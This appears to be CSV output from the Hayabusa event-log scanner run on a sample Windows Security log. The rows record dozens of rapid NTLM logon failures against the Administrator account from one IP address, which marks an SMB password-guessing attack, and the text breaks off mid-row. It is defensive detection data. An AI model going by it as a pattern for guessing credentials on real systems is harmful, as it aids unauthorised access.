2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnHR9DAtgzu561sx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfBl3dbluZ7GiFum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Hlgn7gsZwRvlXAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eyHVPtGpnmmRjJuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0l3QC0rLt9yGaIe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XfEng3JgXLmgI8GN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ORIegzlkHy8AX6RW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AzS4xRnHKxSwz5sZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0hA1XvRIlqwKG6g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mKXKkvlHvjRh33Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JIMTGRC5IQlkrG9c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NYcLsxwbg8LkGCuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kmttijRBtXqEbU0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXC3hYI1Gin59gvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQiozAIr9Jgklmks | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O598IvZRpbdU1liO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xlmYWrAnn3sUNSRk | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aAAkO0uOGIq8zVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 26K4BIpgUbBNWbDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moW3Ts7edqoQ9XeU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8C4d3xE0QkWywbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1EgYFhtgrcjtcXM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.116 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7avpgQeA0KCIme9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFgmt3OEw4cDfPhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OqITdE5K63nJg9tg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBs4fYCiprxgDd43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBD0Q2szeURxMYA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KPUi2NhPP92Rs3hy | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PrbMf9E0fOuwIB8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 807zsxQ9WETO9YIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGMJKRYUlmijJV40 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv33to031A0fQzX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IT0bzycur7HXFeLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.793 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyY2K7tT0HgQ1ZL3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6aexuFPH6FyEZ1bN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o8Iojas6sznqlYUE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U2SnliYkmx59ACSM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2plWY1GZHilHv5Vh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIfmqihMJdPVz80p | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Odg692Eyde8md0t7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gsQNvf5HkRQnbDul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: il2DGq3bzfwGuJN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9OsQFOcIyougrx0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gR8wpQrGYzd4NrBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.282 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFjRsjWXbEPs9m1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wbjudOy3rWefzAIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Q4gc8keCTv2HeE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SmsaxHrHYuofUhAH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvhWasTJYmChfsNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DszGfEo9aua2y5UC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lZPScjxczbrcJuvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucpjxJV4rBXOxy4e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BmTtDfX05VsKFrON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhWSUkQhv089RSfJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8RXCiXQYgjuPO78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.773 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfB3u3Np38FOw6hc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9GcSmto4jdCIw6H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HsogJdHUcldt7JeH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IUbkohKtCy6joOBY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9ZFyYxBrKnz652Co | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQ2MHr71xALFHJqN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgjHOgEYRLQiJX75 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXLjSNCeDAaX4ttQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np6hwdqnWLJawVn9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: adqqChrYx3lZ0BAa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1GTXkOnNYTws1MiC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.266 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QUvFvCM6AJhKjXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NiVgC8oJ5W2Xr3t0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hXfhdrbLnNOGDqy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcjMGbrHQHxIhSSh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDYPTYHHKAe39GjM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PF3H6LE6MqFjVWx | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LLTReOoxRa7UAhT3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqtqwAPBiBfaHNpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmisFXzDpOILUhIX | IP Addr: 192.168.198.149 | AuthPackage: 